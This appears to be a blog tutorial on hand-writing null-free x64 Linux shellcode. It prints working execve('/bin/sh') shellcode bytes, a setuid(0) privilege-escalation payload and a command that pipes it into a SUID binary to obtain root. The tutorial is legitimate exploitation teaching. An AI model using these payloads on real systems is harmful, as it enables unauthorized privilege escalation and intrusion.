Crafting x64 Shellcode From Scratch: A Practical Guide

May 23, 2026 in Security by Gerboise · 13 minutes

I’ve been tinkering with binary exploitation for a while now, and most of the targets I encounter are x86_64. Writing shellcode by hand isn’t something I do every day, maybe a few times a year at best. But every time I need one, it takes me a good two to three hours just to get back up to speed. The calling conventions, the register layout, the syscall numbers… it all needs to come back piece by piece.

What makes it worse is that most shellcode tutorials you’ll find online are written for x86 (32-bit). The classic int 0x80 examples are everywhere, but clean x64 examples? Much harder to come by. So I decided to write the reference I wish I had: a straightforward walkthrough of building x64 shellcode from the ground up.

Chapter 1: x64 Basics

Before writing any shellcode, let’s cover the essentials of how x64 Linux talks to the kernel.

Syscalls

A syscall is how user-space programs ask the kernel to do things (open files, spawn processes, exit). On x64, you trigger a syscall with the syscall instruction (not int 0x80, which is the 32-bit interface).

The syscall number goes in rax, and arguments are passed in registers in this order:

Register   Purpose
rax        syscall number
rdi        arg 1
rsi        arg 2
rdx        arg 3
r10        arg 4
r8         arg 5
r9         arg 6

Full syscall list with arguments: Linux System Call Table for x86_64.
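
To make the register order easier to remember, here is a small Python sketch that maps a syscall number and its arguments onto the registers listed above. The helper name syscall_layout is made up for illustration; it only builds a dictionary and does not call the kernel.

```python
# Argument registers for x86_64 Linux syscalls, in order (from the table above).
SYSCALL_ARG_REGS = ("rdi", "rsi", "rdx", "r10", "r8", "r9")

def syscall_layout(number, *args):
    """Return a {register: value} plan for a syscall (illustrative helper)."""
    if len(args) > len(SYSCALL_ARG_REGS):
        raise ValueError("x86_64 syscalls take at most 6 arguments")
    layout = {"rax": number}
    layout.update(zip(SYSCALL_ARG_REGS, args))
    return layout

# exit(0): syscall number 60, one argument
print(syscall_layout(60, 0))   # {'rax': 60, 'rdi': 0}
```

Reading the result top to bottom gives the order in which a shellcode has to load its registers before the syscall instruction.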

Toolchain

We’ll use NASM (Netwide Assembler) with Intel syntax, and ld to link. The build command throughout this guide is:

$ nasm -f elf64 shellcode.asm -o shellcode.o && ld shellcode.o -o shellcode

To disassemble and inspect the generated opcodes:

$ objdump -d -M intel --disassemble=_start shellcode.o

Chapter 2: A First Shellcode, exit(0)

Let’s start with the simplest possible shellcode: calling exit(0).

;  nasm -f elf64 shellcode.asm -o shellcode.o && ld shellcode.o -o shellcode
BITS 64

global _start
_start:
    xor rdi, rdi        ; rdi = 0 (exit code)
    mov al, 60          ; syscall number for exit (0x3c = 60)
    syscall

Build and run it:

$ nasm -f elf64 shellcode.asm -o shellcode.o && ld shellcode.o -o shellcode
$ ./shellcode
$ echo $?
0

A few things to note:

  • xor rdi, rdi zeroes out rdi, the first argument to our syscall (exit code = 0).
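  • mov al, 60 loads 60, the syscall number for exit, into the low byte of rax. This relies on the rest of rax already being zero, which in practice holds at the entry point of a freshly started process but not for injected shellcode (more on that in Chapter 7).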
  • syscall triggers the kernel call.

Let’s disassemble to see what we actually produced:

$ objdump -d -M intel --disassemble=_start shellcode.o

shellcode.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <_start>:
   0:    48 31 ff                 xor    rdi,rdi
   3:    b0 3c                    mov    al,0x3c
   5:    0f 05                    syscall

We can see our disassembled code with the hex bytes on the left. Everything looks good. Now that we know how to assemble, link, and inspect our shellcode, let’s build something useful.
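
The hex column of that listing is the shellcode itself. Below is a minimal Python sketch for pulling those bytes out of objdump's text output. It assumes objdump's usual tab-separated layout (address, hex bytes, mnemonic), and the function name opcodes_from_objdump is hypothetical.

```python
def opcodes_from_objdump(text: str) -> bytes:
    """Collect opcode bytes from `objdump -d` output.

    Assumes the usual tab-separated layout: address, hex bytes, mnemonic.
    """
    out = bytearray()
    for line in text.splitlines():
        fields = line.split("\t")
        # Instruction lines start with whitespace and carry a hex-bytes field.
        if len(fields) < 2 or not line.startswith(" "):
            continue
        out += bytes.fromhex(fields[1])
    return bytes(out)

# The exit(0) disassembly from above, with objdump's tab separators restored.
sample = (
    "0000000000000000 <_start>:\n"
    "   0:\t48 31 ff             \txor    rdi,rdi\n"
    "   3:\tb0 3c                \tmov    al,0x3c\n"
    "   5:\t0f 05                \tsyscall\n"
)
code = opcodes_from_objdump(sample)
print("".join(f"\\x{b:02x}" for b in code))   # \x48\x31\xff\xb0\x3c\x0f\x05
```

Continuation lines (the second half of a long instruction) have the same address-and-bytes shape without a mnemonic, so they go through the same code path.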

Chapter 3: Spawning a Shell, The Classic execve

The Goal

The most common use case for shellcode: you’ve found a vulnerable SUID binary, and you need to pop a shell to inherit its privileges. The simplest way to do that is to call execve("/bin/sh", NULL, NULL), which replaces the current process with a shell.

Let’s start with what this looks like as a normal C program:

// main.c
#include <unistd.h>

int main(int argc, char ** argv){
    execve("/bin/sh",0,0);
    return 0;
}

Compile and run it:

gerboise@fedora-3:/run/host/home/gerboise/Documents/blog$ gcc main.c -o main
gerboise@fedora-3:/run/host/home/gerboise/Documents/blog$ ./main
[gerboise@fedora-3 blog]$ id
uid=1000(gerboise) gid=1000(gerboise) groups=1000(gerboise),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[gerboise@fedora-3 blog]$

Assembly version

Now let’s do the same thing in assembly. Looking at the syscall table, execve is syscall 59 with three arguments: rdi = filename, rsi = argv, rdx = envp.

;  nasm -f elf64 shellcode.asm -o shellcode.o && ld shellcode.o -o shellcode
BITS 64

global _start
_start:
    mov rax, 0         ; clear rax
    mov al, 59         ; execve
    mov rdi, str_file  ; const char *filename
    mov rsi, 0         ; const char *const argv[]
    mov rdx, 0         ; const char *const envp[]
    syscall
    mov al, 60         ; exit
    syscall

str_file:
    db "/bin/sh", 0

Build and run:

$ nasm -f elf64 shellcode.asm -o shellcode.o && ld shellcode.o -o shellcode
$ ./shellcode
$ id
uid=1000(gerboise) gid=1000(gerboise) groups=1000(gerboise),10(wheel)
$

It works, we get a shell. Let’s disassemble the final binary:

$ objdump -d -M intel --disassemble=_start shellcode

shellcode:     file format elf64-x86-64


Disassembly of section .text:

0000000000400080 <_start>:
  400080:    b8 00 00 00 00           mov    eax,0x0
  400085:    b0 3b                    mov    al,0x3b
  400087:    48 bf a1 00 40 00 00     movabs rdi,0x4000a1
  40008e:    00 00 00
  400091:    be 00 00 00 00           mov    esi,0x0
  400096:    ba 00 00 00 00           mov    edx,0x0
  40009b:    0f 05                    syscall
  40009d:    b0 3c                    mov    al,0x3c
  40009f:    0f 05                    syscall

That’s a lot of 00 bytes in there.

Chapter 4: Removing Null Bytes

Why do null bytes matter? In most exploitation scenarios, shellcode gets injected through string functions like strcpy, strcat, or sprintf. These functions treat 0x00 as a string terminator. If your shellcode contains a null byte, everything after it gets truncated and your payload breaks. Other input paths have their own bad bytes: gets, for instance, reads straight through 0x00 but stops at a newline (0x0a).
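
A minimal Python simulation of that truncation, applied to the first two instructions of the Chapter 3 listing. The function strcpy_like is a stand-in written for this example, not a real libc binding.

```python
def strcpy_like(payload: bytes) -> bytes:
    """Copy bytes up to (not including) the first 0x00, like strcpy would."""
    end = payload.find(b"\x00")
    return payload if end == -1 else payload[:end]

# First instructions of the Chapter 3 listing: mov eax,0x0 ; mov al,0x3b
chapter3_start = bytes.fromhex("b800000000" "b03b")

copied = strcpy_like(chapter3_start)
print(len(chapter3_start), "bytes sent,", len(copied), "bytes copied")
# 7 bytes sent, 1 bytes copied
```

Only the opcode byte b8 survives the copy, so the target would end up executing garbage.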

A bad idea: moving the string before the code

A first idea might be to move the data before the code:

BITS 64

str_file:
    db "/bin/sh", 0

global _start
_start:
    mov rax, 0
    mov al, 59
    mov rdi, str_file
    mov rsi, 0
    mov rdx, 0
    syscall
    mov al, 60
    syscall

But this doesn’t help. str_file now sits before _start in the .text section, so the bytes of "/bin/sh" (2f 62 69 6e 2f 73 68 00) are still part of the payload, and the CPU would try to execute them as instructions if execution ever reached that address. More importantly, this doesn’t solve our null byte problem at all: the string still ends with 00, and the absolute address of str_file still encodes with nulls in the movabs.

Step 1: Building the string on the stack

Instead of storing the string as data in the binary, we can build it at runtime on the stack. This way we don’t need a label or an absolute address, we just push the bytes and point rdi at rsp.

One problem: "/bin/sh" is 7 bytes. A push on x64 works with 8-byte values. We could pad with a null byte, but that’s exactly what we’re trying to avoid. The trick is to use "/bin//sh" (8 bytes exactly), and Linux doesn’t care about the extra / in a path.

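But how do we get the hex value for "/bin//sh"? x86_64 is little-endian: the least significant byte of a value is stored at the lowest address. For the string to read correctly in memory, its first character has to be the lowest byte of the 64-bit value, so we write the ASCII bytes in reverse order: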

"/bin//sh" as ASCII:  2f 62 69 6e 2f 2f 73 68
reversed (little-endian): 68 73 2f 2f 6e 69 62 2f
as a 64-bit value:    0x68732f2f6e69622f

You can also get it with Python:

$ python3 -c 'import struct; print(hex(struct.unpack("<Q", b"/bin//sh")[0]))'
0x68732f2f6e69622f

;  nasm -f elf64 shellcode.asm -o shellcode.o && ld shellcode.o -o shellcode
BITS 64

global _start
_start:
    mov rax, 0
    mov al, 59                         ; execve

    mov r8, 0                          ; push a null qword on the stack
    push r8                            ; this will be the string terminator

    mov r8, 0x68732F2F6E69622F         ; "/bin//sh" as a 64-bit value
    push r8                            ; push the string on the stack

    mov rdi, rsp                       ; rdi points to "/bin//sh\0" on the stack
    mov rsi, 0                         ; argv = NULL
    mov rdx, 0                         ; envp = NULL
    syscall

    mov al, 60                         ; exit
    syscall

The stack now looks like this when we hit syscall:

        low addresses
rsp →  | 2F 62 69 6E 2F 2F 73 68 |   "/bin//sh"
       | 00 00 00 00 00 00 00 00 |   null terminator
        high addresses

rdi points to rsp, which is the start of our string, properly null-terminated.
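
To double-check that layout without a debugger, here is a toy Python model of the two pushes. The Stack class is purely illustrative: addresses are just offsets into a bytearray, and only 8-byte pushes are modelled.

```python
import struct

class Stack:
    """Toy downward-growing stack; addresses are offsets into a buffer."""
    def __init__(self, size=64):
        self.mem = bytearray(size)
        self.rsp = size          # empty stack: rsp sits at the top

    def push(self, value):
        self.rsp -= 8
        self.mem[self.rsp:self.rsp + 8] = struct.pack("<Q", value)

    def c_string_at(self, addr):
        end = self.mem.index(0, addr)   # first null byte at or after addr
        return bytes(self.mem[addr:end])

stack = Stack()
stack.push(0)                         # null terminator qword
stack.push(0x68732F2F6E69622F)        # "/bin//sh"
print(stack.c_string_at(stack.rsp))   # b'/bin//sh'
```

The second push lands at the lower address, which is why the terminator has to be pushed first.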

Let’s disassemble:

$ objdump -d -M intel --disassemble=_start shellcode

0000000000400080 <_start>:
  400080:    b8 00 00 00 00           mov    eax,0x0
  400085:    b0 3b                    mov    al,0x3b
  400087:    41 b8 00 00 00 00        mov    r8d,0x0
  40008d:    41 50                    push   r8
  40008f:    49 b8 2f 62 69 6e 2f     movabs r8,0x68732f2f6e69622f
  400096:    2f 73 68
  400099:    41 50                    push   r8
  40009b:    48 89 e7                 mov    rdi,rsp
  40009e:    be 00 00 00 00           mov    esi,0x0
  4000a3:    ba 00 00 00 00           mov    edx,0x0
  4000a8:    0f 05                    syscall
  4000aa:    b0 3c                    mov    al,0x3c
  4000ac:    0f 05                    syscall

We got rid of the movabs rdi with the absolute address, but there are still plenty of null bytes. mov eax,0x0, mov r8d,0x0, mov esi,0x0, mov edx,0x0 all encode with 00 bytes.

Step 2: Replacing mov ..., 0 with xor

Every mov reg, 0 encodes the zero as an immediate value, that’s 4 bytes of 00. The simple fix: xor reg, reg. XORing a register with itself always gives zero, and the instruction encodes without any null bytes. As a bonus, it’s also shorter: xor rax, rax is 3 bytes vs mov eax, 0x0 which is 5 bytes.

;  nasm -f elf64 shellcode.asm -o shellcode.o && ld shellcode.o -o shellcode
BITS 64

global _start
_start:
    xor rax, rax                       ; rax = 0 (no null bytes, 3 bytes)
    mov al, 59                         ; execve

    xor r8, r8                         ; r8 = 0 (no null bytes, 3 bytes)
    push r8                            ; push null terminator on stack

    mov r8, 0x68732F2F6E69622F         ; "/bin//sh" as a 64-bit value
    push r8                            ; push the string on the stack

    mov rdi, rsp                       ; rdi points to "/bin//sh\0" on the stack
    xor rsi, rsi                       ; argv = NULL (no null bytes, 3 bytes)
    xor rdx, rdx                       ; envp = NULL (no null bytes, 3 bytes)
    syscall

    mov al, 60                         ; exit
    syscall

Let’s disassemble:

$ objdump -d -M intel --disassemble=_start shellcode.o

0000000000000000 <_start>:
   0:    48 31 c0                 xor    rax,rax
   3:    b0 3b                    mov    al,0x3b
   5:    4d 31 c0                 xor    r8,r8
   8:    41 50                    push   r8
   a:    49 b8 2f 62 69 6e 2f     movabs r8,0x68732f2f6e69622f
  11:    2f 73 68
  14:    41 50                    push   r8
  16:    48 89 e7                 mov    rdi,rsp
  19:    48 31 f6                 xor    rsi,rsi
  1c:    48 31 d2                 xor    rdx,rdx
  1f:    0f 05                    syscall
  21:    b0 3c                    mov    al,0x3c
  23:    0f 05                    syscall

No more null bytes. We can extract the raw shellcode:

\x48\x31\xc0\xb0\x3b\x4d\x31\xc0\x41\x50\x49\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x41\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\xb0\x3c\x0f\x05
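
Rather than eyeballing the bytes, a few lines of Python can confirm the result. This is a small sketch; find_bad_bytes is a name invented here, and which bytes count as "bad" depends on how the target reads its input (the newline check below is only an example).

```python
def find_bad_bytes(payload: bytes, bad: bytes = b"\x00"):
    """Return (offset, byte) pairs for every byte of `payload` found in `bad`."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]

# The shellcode from the disassembly above, one instruction per literal.
shellcode = bytes.fromhex(
    "4831c0" "b03b" "4d31c0" "4150"
    "49b82f62696e2f2f7368" "4150"
    "4889e7" "4831f6" "4831d2"
    "0f05" "b03c" "0f05"
)

print(len(shellcode))                          # 37
print(find_bad_bytes(shellcode))               # []
print(find_bad_bytes(shellcode, b"\x00\x0a"))  # []
```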

Chapter 5: Testing the Shellcode

Now let’s make sure our shellcode actually works when injected as raw bytes. First, extract the opcodes from the binary:

$ objdump -d -M intel --disassemble=_start shellcode | grep '^ ' | cut -f2 | tr -d ' \n' | sed 's/\(..\)/\\x\1/g'
\x48\x31\xc0\xb0\x3b\x4d\x31\xc0\x41\x50\x49\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x41\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\xb0\x3c\x0f\x05

We can paste this into a small C program that allocates an executable memory region with mmap, copies the shellcode into it, and jumps to it:

// gcc -o test_shellcode test_shellcode.c
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

unsigned char shellcode[] = "\x48\x31\xc0\xb0\x3b\x4d\x31\xc0\x41\x50\x49\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x41\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\xb0\x3c\x0f\x05";

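int main(void) {
    printf("Shellcode length: %zu\n", sizeof(shellcode) - 1);

    // Anonymous read/write/execute mapping to hold the shellcode
    void *mem = mmap(NULL, sizeof(shellcode), PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    if (mem == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    memcpy(mem, shellcode, sizeof(shellcode));
    ((void (*)(void))mem)();   // jump to the copied bytes

    return 0;
}

$ gcc -o test_shellcode test_shellcode.c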
$ ./test_shellcode
Shellcode length: 37
$ id
uid=1000(gerboise) gid=1000(gerboise) groups=1000(gerboise)
$

37 bytes, null-free, and it pops a shell.

Chapter 6: Exploiting SUID Binaries

Our shellcode spawns a shell, but if we’re exploiting a SUID binary, we need to make sure we actually get root privileges. When a root-owned SUID binary runs, the process has an effective uid of 0, but the real uid is still ours. By default, /bin/sh typically drops privileges if the real and effective uids don’t match. We need to call setuid(0) and setgid(0) before execve to set the real uid/gid to 0.

Looking at the syscall table:

  • setuid is syscall 105 (0x69), takes rdi = uid
  • setgid is syscall 106 (0x6a), takes rdi = gid

;  nasm -f elf64 shellcode.asm -o shellcode.o && ld shellcode.o -o shellcode
BITS 64

global _start
_start:
    xor rax, rax
    mov al, 105        ; setuid(0)
    xor rdi, rdi       ; uid = 0
    syscall

    xor rax, rax
    mov al, 106        ; setgid(0)
    xor rdi, rdi       ; gid = 0
    syscall

    xor rax, rax
    mov al, 59         ; execve
    xor r8, r8
    push r8            ; null terminator
    mov r8, 0x68732F2F6E69622F
    push r8            ; "/bin//sh"
    mov rdi, rsp
    xor rsi, rsi       ; argv = NULL
    xor rdx, rdx       ; envp = NULL
    syscall

    xor rax, rax
    mov al, 60         ; exit
    syscall
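
As a cross-check, the listing can be assembled by hand in Python from encodings that already appeared in the earlier disassemblies. This is only a sketch: the helper names are invented for this example, and it covers exactly the instructions used above, nothing more.

```python
# Encodings taken from the disassemblies earlier in this guide.
# mov al, imm8 is the opcode b0 followed by the immediate byte.
XOR_RAX = bytes.fromhex("4831c0")
XOR_RDI = bytes.fromhex("4831ff")
SYSCALL = bytes.fromhex("0f05")

def mov_al(n):
    return bytes([0xB0, n])

def simple_call(number):
    """xor rax,rax ; mov al,number ; xor rdi,rdi ; syscall"""
    return XOR_RAX + mov_al(number) + XOR_RDI + SYSCALL

execve = (
    XOR_RAX + mov_al(59)
    + bytes.fromhex("4d31c0" "4150")        # xor r8,r8 ; push r8
    + bytes.fromhex("49b8") + b"/bin//sh"   # mov r8, "/bin//sh"
    + bytes.fromhex("4150" "4889e7")        # push r8 ; mov rdi,rsp
    + bytes.fromhex("4831f6" "4831d2")      # xor rsi,rsi ; xor rdx,rdx
    + SYSCALL
)
exit_ = XOR_RAX + mov_al(60) + SYSCALL

payload = simple_call(105) + simple_call(106) + execve + exit_
assert b"\x00" not in payload
print(len(payload))   # 60
```

Assembling with NASM and extracting the bytes with objdump should give the same 60 bytes.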

To feed this to a vulnerable binary via stdin (the padding and return address a real overflow needs are target-specific and omitted here):

$ python3 -c 'import sys; sys.stdout.buffer.write(b"\x48\x31\xc0\xb0\x69\x48\x31\xff\x0f\x05\x48\x31\xc0\xb0\x6a\x48\x31\xff\x0f\x05\x48\x31\xc0\xb0\x3b\x4d\x31\xc0\x41\x50\x49\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x41\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\x48\x31\xc0\xb0\x3c\x0f\x05")' > /tmp/payload
$ (cat /tmp/payload; cat) | ./vulnerable_suid_binary
$ id
uid=0(root) gid=0(root)

The cat at the end keeps stdin open so the spawned shell doesn’t exit immediately.

Chapter 7: Shellcode Writing Tips

Here’s a collection of common techniques for writing x64 shellcode that we haven’t fully covered in the previous chapters.

jmp/call/pop, getting a string address without absolute references

This is a classic trick. The call instruction pushes the return address (the address of the next instruction) onto the stack. If we place our string right after the call, we can pop its address into a register:

    jmp short forward       ; jump over the string
back:
    pop rdi                 ; rdi = address of "/bin//sh" (pushed by call)
    ; ... rest of shellcode ...

forward:
    call back               ; pushes address of str_file onto the stack
str_file:
    db "/bin//sh", 0

The flow is: jmp forward → call back (pushes the address of str_file) → pop rdi (rdi now points to the string). This is position-independent: it works regardless of where the shellcode lands in memory, because call uses a relative offset. And since call back jumps backwards, that offset is negative and encodes with ff bytes rather than 00.

LEA relative to RIP

On x64, you can use RIP-relative addressing to reference data without absolute addresses:

    lea rdi, [rel str_file]
    ; ...
str_file:
    db "/bin//sh", 0

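lea rdi, [rel str_file] encodes a 32-bit offset relative to the address of the next instruction, so no absolute address is needed. It is shorter and simpler than jmp/call/pop, but only available on x64. One caveat: when str_file sits a short distance after the lea, as above, the small positive offset is padded with 00 bytes (for example 0a 00 00 00). Placing the string before the code makes the offset negative, which pads with ff instead.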
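
How a relative offset encodes is easy to check in Python. The sketch below packs a 32-bit displacement the way call rel32 and RIP-relative lea store it, measured from the address of the next instruction. The offsets used are hypothetical and only chosen to show one forward and one backward reference.

```python
import struct

def rel32(target: int, next_instruction: int) -> bytes:
    """Little-endian 32-bit displacement from the next instruction to target."""
    return struct.pack("<i", target - next_instruction)

# Hypothetical layout: a 7-byte lea at offset 0, so the next instruction is at 7.
forward = rel32(target=0x11, next_instruction=7)     # data placed after the code
backward = rel32(target=-0x09, next_instruction=7)   # data placed before the code

print(forward.hex(" "))    # 0a 00 00 00
print(backward.hex(" "))   # f0 ff ff ff
```

A forward reference over a short distance leaves three 00 bytes in the instruction, while a backward one fills the same positions with ff.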

Using sub-registers to avoid null bytes

x64 registers have smaller sub-registers that you can write to independently:

rax (64-bit) → eax (32-bit) → ax (16-bit) → al (8-bit)

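When you need to load a small value, use the smallest register that fits. The encodings below are the textbook ones; NASM’s optimizer may already shrink mov rax, 59 to the mov eax form, as the Chapter 3 disassembly shows for mov rax, 0: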

mov rax, 59       ; 48 c7 c0 3b 00 00 00  (7 bytes, contains null bytes)
mov eax, 59       ; b8 3b 00 00 00         (5 bytes, still has null bytes)
mov al, 59        ; b0 3b                  (2 bytes, no null bytes!)

The catch: mov al only sets the low byte, the upper bytes of rax keep their previous value. That’s why we xor rax, rax first to clear the whole register, then mov al to set the syscall number.

Note that any write to a 32-bit register such as eax zero-extends into the full 64-bit rax on x64, so xor eax, eax (2 bytes) does the same as xor rax, rax (3 bytes), a free byte saved.
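
The difference between the two kinds of write can be modelled in a few lines of Python. This is a rough sketch with invented helper names; it treats rax as a plain 64-bit integer and uses a leftover error value of -2 as an example of stale contents.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF

def write_al(rax: int, value: int) -> int:
    """mov al, value: only the low 8 bits change."""
    return (rax & ~0xFF & MASK64) | (value & 0xFF)

def write_eax(rax: int, value: int) -> int:
    """mov eax, value (or xor eax, eax): upper 32 bits are cleared."""
    return value & 0xFFFFFFFF

# Example of stale contents: -2 stored as an unsigned 64-bit value.
rax = -2 & MASK64

print(hex(write_al(rax, 60)))                  # 0xffffffffffffff3c
print(hex(write_al(write_eax(rax, 0), 60)))    # 0x3c
```

Without the clearing step, the kernel would see a huge bogus syscall number instead of 60.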

Padding strings with extra slashes

As we saw in chapter 4, "/bin/sh" is 7 bytes, awkward for 8-byte pushes. Linux ignores consecutive slashes in paths, so:

  • "/bin//sh" (8 bytes, fits in one push)
  • "//bin/sh" (also works)
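
The same padding idea extends to longer paths. Here is a small Python sketch that pads an absolute path with leading slashes up to a multiple of 8 bytes and returns the 64-bit values in the order they would be pushed. The function name push_qwords is made up for this example, and the null terminator still has to be pushed separately beforehand.

```python
import struct

def push_qwords(path: bytes):
    """Pad `path` with extra leading slashes to a multiple of 8 bytes and
    return the 64-bit values to push, in push order (last chunk first)."""
    if not path.startswith(b"/"):
        raise ValueError("expected an absolute path")
    pad = -len(path) % 8
    padded = b"/" * pad + path
    chunks = [padded[i:i + 8] for i in range(0, len(padded), 8)]
    return [struct.unpack("<Q", c)[0] for c in reversed(chunks)]

print([hex(q) for q in push_qwords(b"/bin/sh")])   # ['0x68732f6e69622f2f']
```

The last chunk is pushed first so that the start of the path ends up at the lowest address, where rsp points.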

Avoiding syscall clobbering

The syscall instruction overwrites rcx and r11 (it saves rip into rcx and rflags into r11). If you’re chaining multiple syscalls, don’t store anything important in those registers between calls.

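rax is overwritten too: after a syscall it holds the return value, so you need to set the syscall number again before each call (which is why we repeat mov al, ... before each syscall). On failure, that return value is a negative errno with the upper bytes set, which is another reason to xor rax, rax before the mov al.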

NOP sled

When exploiting a buffer overflow, you often don’t know the exact address where your shellcode will land in memory. A NOP sled is a long sequence of nop instructions (0x90) prepended to your shellcode. If execution jumps anywhere into the sled, it slides down to your actual code:

| 90 90 90 90 90 90 90 90 90 90 | shellcode... |
  ^--- jump lands somewhere here ---> slides to shellcode

The bigger the sled, the larger your target window. In practice, you might prepend hundreds or thousands of NOPs before your payload to increase the chances of hitting it.
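
Building such a payload is a one-liner in Python. A minimal sketch, assuming a fixed total length that the target buffer would dictate; the function name and the length of 64 are arbitrary choices for illustration.

```python
NOP = b"\x90"

def with_nop_sled(shellcode: bytes, total_len: int) -> bytes:
    """Left-pad `shellcode` with NOPs so the result is `total_len` bytes."""
    if len(shellcode) > total_len:
        raise ValueError("shellcode does not fit in the requested length")
    return NOP * (total_len - len(shellcode)) + shellcode

# Placeholder standing in for real shellcode: exit(0) from Chapter 2.
shellcode = bytes.fromhex("4831ff" "b03c" "0f05")
payload = with_nop_sled(shellcode, 64)
print(len(payload), payload.count(NOP))   # 64 57
```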

Conclusion

This was a quick refresher on writing x64 shellcode from scratch. Next up: Return-Oriented Programming (ROP).

Writing this article was also a learning experience for me. I used to do everything with hexdump, but working with objdump turned out to be a game changer. Being able to assemble, link, and run the shellcode as a proper ELF binary to test it, then extract the raw opcodes in one command, that’s a considerable time saver compared to my old workflow.